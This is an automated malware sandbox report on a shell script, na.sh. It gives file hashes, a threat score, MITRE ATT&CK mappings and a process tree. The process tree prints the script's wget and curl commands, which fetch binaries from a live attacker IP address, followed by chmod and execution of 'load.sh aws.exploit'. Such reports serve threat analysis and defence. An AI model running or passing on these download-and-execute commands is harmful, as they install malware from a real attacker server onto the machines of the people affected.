ebbb403ae5c2bf4cbfa72c30f5e061d73fa5465c0a7c455e18a2cc73b413d160

Analysis

max time kernel
149s
max time network
70s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
17-10-2024 06:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

4KB
MD5

2d520ab45c89c24520e0754fd1971be2
SHA1

96e5de0ce70de4fa0f1adcd586aa49608bd578ea
SHA256

ebbb403ae5c2bf4cbfa72c30f5e061d73fa5465c0a7c455e18a2cc73b413d160
SHA512

496e0ee73afc2d1263db3012dec1578c3d493229a28e4fe97d5b63390ed86441b0fc42bc3f7d494569209b8642e8f5c9e239907cd1b8124bdeff619ba85e902b
SSDEEP

96:vNVjWNw41Nx/SNN7uNdMdEpFDNn90NUsRN2mHNRfCN3t8NueXNyS7NGWfNPl3:IO4Fi

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
779	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/load.sh	780	load.sh

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx

Reads runtime system information 1 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
782	wget

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl
File opened for modification	/tmp/load.sh	na.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	wget

/tmp/na.sh
/tmp/na.sh
1⤵
- Writes file to tmp directory
PID:703
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:708
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:778
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh na.sh systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-QCShuG
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/load.sh
  ./load.sh aws.exploit
  2⤵
  - Executes dropped EXE
  PID:780
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:782

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
33KB

MD5
6d1b6e91b1e2037fbf62ca7ddcf04932

SHA1
d0769095ec2e678074eb206b3537022129c1a776

SHA256
7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

SHA512
7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

Download Submit